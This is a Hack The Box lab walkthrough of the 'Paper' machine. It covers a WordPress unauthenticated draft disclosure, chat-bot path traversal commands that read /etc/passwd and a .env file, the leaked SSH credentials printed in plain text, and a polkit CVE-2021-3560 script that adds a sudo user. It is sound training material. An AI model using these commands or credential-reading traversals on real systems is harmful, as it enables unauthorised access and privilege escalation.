Paper — Hackthebox Walkthrough

This was a box that I learned the importance of enumeration. Really loved the realism of the box and the exploitation chain.

User

As usual, starting with nmap gave me 3 open ports.

nmap -sV -sC 10.10.11.143

PORT    STATE SERVICE    REASON  VERSION
22/tcp open tcpwrapped syn-ack
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open tcpwrapped syn-ack
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
443/tcp open tcpwrapped syn-ack
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/organizationalUnitName=ca-3899279223185377061/emailAddress=root@localhost.localdomain

Visiting port 80 was the default Centos webpage.

http://10.10.11.143/

Looking at the server response headers, there was a header specifying the backend server as office.paper

NOTE: “You can also find this out by using curl with -I option.”

Adding the entry to my hosts config file and visiting the domain, we see a WordPress installation.

sudo echo 10.10.11.143 office.paper >> /etc/hosts

Running wpscan against the site told me the WordPress version.

wpscan --url http://office.paper

Googling around, I found a vulnerability that lets read me saved drafts unauthenticated.

https://wpscan.com/vulnerability/9909

As mentioned, I was able to read a saved drafts by setting the static parameter to 1 in the URL.

http://office.paper/?static=1

The drafts tells about a new vhost which is chat.office.paper . Adding this to the hosts config file and visiting it, gives us a chat application called “Rocket chat”.

As mentioned, we need a secret registration link to register. We did get that from the draft we saw in WordPress. So we can use that to register as user.

http://chat.office.paper/register/8qozr226AhkCHZdyY

After registering and logging in, we can see that there is a general channel which we have read access to. Looking at the chat history, we can see that there is a server bot named “recylops”.

In the chat we can see how to use the bot as well. And we see that we can list and read files through the bot.

So we can try to use the bot to list the files in the server. First we have to start a conversation with the bot.

Then with this command we can list the files in the present directory.

recyclops list .

I was able to read the /etc/passwd file with this command.

recyclops file ../../../etc/passwd

We can list the files in one directory up with this.

recyclops list ..

I saw a a directory as hubot which sound interesting. Listing file inside that directory, I saw .env was there.

And I was able to find some the credentials of the dwight user in /hubot/.env

recyclops file ../hubot/.env
user: dwight 
pass: Queenofblad3s!23

Then I sshed in as dwight with this credentials.

Root

Running linpeas as dwight right away I saw the box is vulnerable to CVE-2021–3560.

NOTE: “Make sure to run the updated linpeas, the old one won’t catch this.”

This vulnerability exploits a functionality in polkit .Googling around I found a script that automates the process of exploitation.

With this script, I was able to add a new user with sudo privileges. Ran the script as follows which added a new user named test with the password of test

./k.sh -u=test -p=test

Then I logged in as test and then used sudo su to get a root shell.

Rooted!

Contact me though social media:

Email — iamkavigihan@gmail.com
Instagram —
https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518

Happy Hacking !!! 😄

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Kavishka Gihan

Kavishka Gihan

Cyber Security Student — find me on instagram @_kavi.gihan